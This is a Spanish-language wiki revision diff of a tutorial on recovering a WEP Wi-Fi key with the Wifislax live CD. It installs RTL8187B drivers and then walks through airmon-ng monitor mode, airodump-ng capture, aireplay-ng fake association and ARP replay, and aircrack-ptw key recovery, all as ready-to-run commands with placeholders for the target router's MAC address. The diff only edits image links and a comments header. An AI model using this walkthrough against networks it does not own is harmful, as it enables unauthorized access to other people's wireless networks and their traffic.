====== Diferencias ====== Muestra las diferencias entre dos versiones de la página.
| Próxima revisión | Revisión previa | ||
|
so:linux:averiguar_contrasena_wep [2013/02/13 02:01] 127.0.0.1 editor externo |
so:linux:averiguar_contrasena_wep [2025/12/09 21:06] (actual) |
||
|---|---|---|---|
| Línea 11: | Línea 11: | ||
| Utilice la ultima versión de Wifislax 3.1 que encontramos en http://download.wifislax.com:8080/wifislax-3.1.iso Es un Live CD (Live CD se le llama a los sistemas operativos que se cargan en un CD y al inicia la PC bootean desde el CD y cargan el sistema operativo en memoria RAM, de esta forma no alteran ninguna información del HD, aparte nos dan la opción de instalarlo luego en el disco). | Utilice la ultima versión de Wifislax 3.1 que encontramos en http://download.wifislax.com:8080/wifislax-3.1.iso Es un Live CD (Live CD se le llama a los sistemas operativos que se cargan en un CD y al inicia la PC bootean desde el CD y cargan el sistema operativo en memoria RAM, de esta forma no alteran ninguna información del HD, aparte nos dan la opción de instalarlo luego en el disco). | ||
| - | {{http://imagenes.argentinap2p.com.ar/di/GXOE/thump_2278797wifislax.jpg}} | + | {{http://imagenes.argentop2p.com.ar/di/GXOE/thump_2278797wifislax.jpg}} |
| Una vez cargado este sistema operativo Linux, empecé a intentar usar las herramientas para ver que podía hacer. Sin éxito. No detectaba la placa inalámbrica. Me di cuenta que el chip de la placa era un RT8187B y el Wifislax no trae los drivers para esta placa (lo verifiqué utilizando el Everest (http://www.lavalys.com/products.php?ps=UE&lang=en&page=9). | Una vez cargado este sistema operativo Linux, empecé a intentar usar las herramientas para ver que podía hacer. Sin éxito. No detectaba la placa inalámbrica. Me di cuenta que el chip de la placa era un RT8187B y el Wifislax no trae los drivers para esta placa (lo verifiqué utilizando el Everest (http://www.lavalys.com/products.php?ps=UE&lang=en&page=9). | ||
| Línea 21: | Línea 21: | ||
| Copie los drivers en una particion de mi disco C:/ (gracias a dios Wifislax monta automáticamente todas las unidades que detecta al inicio, aunque sean NTFS), | Copie los drivers en una particion de mi disco C:/ (gracias a dios Wifislax monta automáticamente todas las unidades que detecta al inicio, aunque sean NTFS), | ||
| - | {{http://imagenes.argentinap2p.com.ar/di/H3CR/perfil1y.jpg}} | + | {{http://imagenes.argentop2p.com.ar/di/H3CR/perfil1y.jpg}} |
| ====== MAC ADRESS ====== | ====== MAC ADRESS ====== | ||
| Línea 27: | Línea 27: | ||
| Mediante Windows busque la MAC ADD de la placa (la obtuve mediante la consola de DOS, colocas ipconfig -all y la anotamos, nos tiene que dar un numero tipo 11:22:3T:44:F5:66, pueden ser letras y números) o sino directamente de las propiedades de la conexion inalambrica | Mediante Windows busque la MAC ADD de la placa (la obtuve mediante la consola de DOS, colocas ipconfig -all y la anotamos, nos tiene que dar un numero tipo 11:22:3T:44:F5:66, pueden ser letras y números) o sino directamente de las propiedades de la conexion inalambrica | ||
| - | {{http://imagenes.argentinap2p.com.ar/di/PMPE/dibujobtf.jpg}} | + | {{http://imagenes.argentop2p.com.ar/di/PMPE/dibujobtf.jpg}} |
| ====== Reinicio y manos a la obra====== | ====== Reinicio y manos a la obra====== | ||
| Línea 33: | Línea 33: | ||
| Reinicie la pc, volví a colocar el LiveCD, inicie nuevamente Wifislax y copie los drivers del disco duro (/mnt/sda1) al directorio ROOT. | Reinicie la pc, volví a colocar el LiveCD, inicie nuevamente Wifislax y copie los drivers del disco duro (/mnt/sda1) al directorio ROOT. | ||
| - | {{http://imagenes.argentinap2p.com.ar/di/K4D5/perfil2w.jpg}} | + | {{http://imagenes.argentop2p.com.ar/di/K4D5/perfil2w.jpg}} |
| Abri una nueva consola y escribí: | Abri una nueva consola y escribí: | ||
| Línea 40: | Línea 40: | ||
| tar -xvf rtl8187B_linux_26.1052.0225.2009.release.tar.gz (el ultimo es el nombre del archivo, si no lo cambiaron lo dejan así tal cual) | tar -xvf rtl8187B_linux_26.1052.0225.2009.release.tar.gz (el ultimo es el nombre del archivo, si no lo cambiaron lo dejan así tal cual) | ||
| - | {{http://imagenes.argentinap2p.com.ar/di/JFI6/perfil5d.jpg}} | + | {{http://imagenes.argentop2p.com.ar/di/JFI6/perfil5d.jpg}} |
| cd rtl8187B_linux_26.1052.0225.2009.release (con esto ingresamos al directorio donde están los drivers) | cd rtl8187B_linux_26.1052.0225.2009.release (con esto ingresamos al directorio donde están los drivers) | ||
| - | {{http://imagenes.argentinap2p.com.ar/di/H4E9/perfil6.jpg}} | + | {{http://imagenes.argentop2p.com.ar/di/H4E9/perfil6.jpg}} |
| make (con este comando instalamos los drivers) | make (con este comando instalamos los drivers) | ||
| Línea 50: | Línea 50: | ||
| ./wlan0up (y ahora "levantamos" nuestra placa) | ./wlan0up (y ahora "levantamos" nuestra placa) | ||
| - | {{http://imagenes.argentinap2p.com.ar/di/7AIC/perfil7.jpg}} | + | {{http://imagenes.argentop2p.com.ar/di/7AIC/perfil7.jpg}} |
| iwconfig (verificamos que ya esta la placa y que todos los parámetros normales) | iwconfig (verificamos que ya esta la placa y que todos los parámetros normales) | ||
| - | {{http://imagenes.argentinap2p.com.ar/di/88F8/perfil10.jpg}} | + | {{http://imagenes.argentop2p.com.ar/di/88F8/perfil10.jpg}} |
| ====== Obtención de contraseña ====== | ====== Obtención de contraseña ====== | ||
| Línea 64: | Línea 64: | ||
| airmon-ng start wlan0 6 (de esta manera colocamos nuestra placa en modo monitor, para poder monitorear las redes del canal 6 (#CH) Nos tiene que aparecer un mensaje diciendo que ay esta en modo monitor | airmon-ng start wlan0 6 (de esta manera colocamos nuestra placa en modo monitor, para poder monitorear las redes del canal 6 (#CH) Nos tiene que aparecer un mensaje diciendo que ay esta en modo monitor | ||
| - | {{http://imagenes.argentinap2p.com.ar/di/SGOK/perfil13.jpg}} | + | {{http://imagenes.argentop2p.com.ar/di/SGOK/perfil13.jpg}} |
| cerramos la consola y abrimos una nueva | cerramos la consola y abrimos una nueva | ||
| Línea 70: | Línea 70: | ||
| airodump-ng –w /mnt/sda1/pass –c1 wlan0 (de esta forma empezamos a monitorear las redes del canal 6 y guardamos los resultados en la carpeta mnt que es donde se montan las unidades. Yo la guardare en sda1 que es la unidad C: de Windows con el nombre de pass) | airodump-ng –w /mnt/sda1/pass –c1 wlan0 (de esta forma empezamos a monitorear las redes del canal 6 y guardamos los resultados en la carpeta mnt que es donde se montan las unidades. Yo la guardare en sda1 que es la unidad C: de Windows con el nombre de pass) | ||
| - | {{http://imagenes.argentinap2p.com.ar/di/5LH0/thump_2278873perfil211.jpg}} | + | {{http://imagenes.argentop2p.com.ar/di/5LH0/thump_2278873perfil211.jpg}} |
| abrimos una nueva consola y ponemos | abrimos una nueva consola y ponemos | ||
| aireplay-ng -1 30 –e NombreESSID –a MACROUTER –h MACNUESTRA wlan0 (con este comando creamos una asociación entre el router y la pc. Debemos intentar una y otra vez hasta que nos aparezca “association sucefull :-)” | aireplay-ng -1 30 –e NombreESSID –a MACROUTER –h MACNUESTRA wlan0 (con este comando creamos una asociación entre el router y la pc. Debemos intentar una y otra vez hasta que nos aparezca “association sucefull :-)” | ||
| - | {{http://imagenes.argentinap2p.com.ar/di/MTYZ/thump_2278710perfil1.jpg}} | + | {{http://imagenes.argentop2p.com.ar/di/MTYZ/thump_2278710perfil1.jpg}} |
| si todo va bien, deberíamos ver algo así | si todo va bien, deberíamos ver algo así | ||
| - | {{http://imagenes.argentinap2p.com.ar/di/84SK/thump_2278716perfil2.jpg}} | + | {{http://imagenes.argentop2p.com.ar/di/84SK/thump_2278716perfil2.jpg}} |
| abrimos otra consola y colocamos | abrimos otra consola y colocamos | ||
| aireplay-ng -3 –x600 –b MACROUTER –h MACNUESTRA wlan0 (con esto comenzamos a leer y enviar paquetes y recibir ARP y guardarlos) | aireplay-ng -3 –x600 –b MACROUTER –h MACNUESTRA wlan0 (con esto comenzamos a leer y enviar paquetes y recibir ARP y guardarlos) | ||
| - | {{http://imagenes.argentinap2p.com.ar/di/ITOK/thump_2278727perfil3.jpg}} | + | {{http://imagenes.argentop2p.com.ar/di/ITOK/thump_2278727perfil3.jpg}} |
| una vez que tenemos una gran cantidad de IV´s (#DATA) (a una gran cantidad me refiero a arriba de 60.000 para claves WEP de 64 bits, o sea 5 caracteres ASCII, o arriba de 150.000 para contraseñas WEP de 128 bits o sea 13 caracteres ASCII) | una vez que tenemos una gran cantidad de IV´s (#DATA) (a una gran cantidad me refiero a arriba de 60.000 para claves WEP de 64 bits, o sea 5 caracteres ASCII, o arriba de 150.000 para contraseñas WEP de 128 bits o sea 13 caracteres ASCII) | ||
| - | {{http://imagenes.argentinap2p.com.ar/di/XYG0/thump_2278734perfil4.jpg}} | + | {{http://imagenes.argentop2p.com.ar/di/XYG0/thump_2278734perfil4.jpg}} |
| abrimos una nueva consola y utilizaremos el siguiente comando | abrimos una nueva consola y utilizaremos el siguiente comando | ||
| Línea 94: | Línea 94: | ||
| aircrack-ptw /mnt/sda1/pass-01.cap (aquí es donde habíamos generado el archivo. Ingresamos al directorio y nos fijamos cual de los archivos es el mas grande (en tamaño kb) y lo usaremos para averiguar la clave WEP en tan solo unos segundos, en este caso el mas grande era el pass-01.cap) | aircrack-ptw /mnt/sda1/pass-01.cap (aquí es donde habíamos generado el archivo. Ingresamos al directorio y nos fijamos cual de los archivos es el mas grande (en tamaño kb) y lo usaremos para averiguar la clave WEP en tan solo unos segundos, en este caso el mas grande era el pass-01.cap) | ||
| - | {{http://imagenes.argentinap2p.com.ar/di/S1M4/thump_2278869perfil5.jpg}} | + | {{http://imagenes.argentop2p.com.ar/di/S1M4/thump_2278869perfil5.jpg}} |
| Por arte de magia (y algoritmos que ningún mago puede explicar) en tan solo un segundo obtuve la clave WEP en caracteres hexadecimales y ASCII. Pero estuve “conectado” unos 15 minutos. | Por arte de magia (y algoritmos que ningún mago puede explicar) en tan solo un segundo obtuve la clave WEP en caracteres hexadecimales y ASCII. Pero estuve “conectado” unos 15 minutos. | ||
| Línea 113: | Línea 113: | ||
| probamos un ping al router | probamos un ping al router | ||
| - | {{http://imagenes.argentinap2p.com.ar/di/PWDK/thump_2278759perfil13.jpg}} | + | {{http://imagenes.argentop2p.com.ar/di/PWDK/thump_2278759perfil13.jpg}} |
| y podemos probar nuestra conexión con un ping a Google por ejemplo | y podemos probar nuestra conexión con un ping a Google por ejemplo | ||
| Línea 119: | Línea 119: | ||
| ping www.google.com | ping www.google.com | ||
| - | {{http://imagenes.argentinap2p.com.ar/di/9OL9/thump_2278765perfil14.jpg}} | + | {{http://imagenes.argentop2p.com.ar/di/9OL9/thump_2278765perfil14.jpg}} |
| y ya estamos conectados! | y ya estamos conectados! | ||
| Línea 131: | Línea 131: | ||
| ---- | ---- | ||
| + | |||
| + | ====== Dudas y comentarios ====== | ||
| Cualquier comentario, sugerencia y/o consulta pueden realizarla en el foro: | Cualquier comentario, sugerencia y/o consulta pueden realizarla en el foro: | ||
| - | [[http://www.argentop2p.net/index.php/topic,117310.0.html|{{:foro-comentarios.png?nolink|}}]] | + | [[http://www.argentop2p.net/index.php/topic,117310.0.html|{{:foro-comentarios.png?nolink|Comentarios}}]] |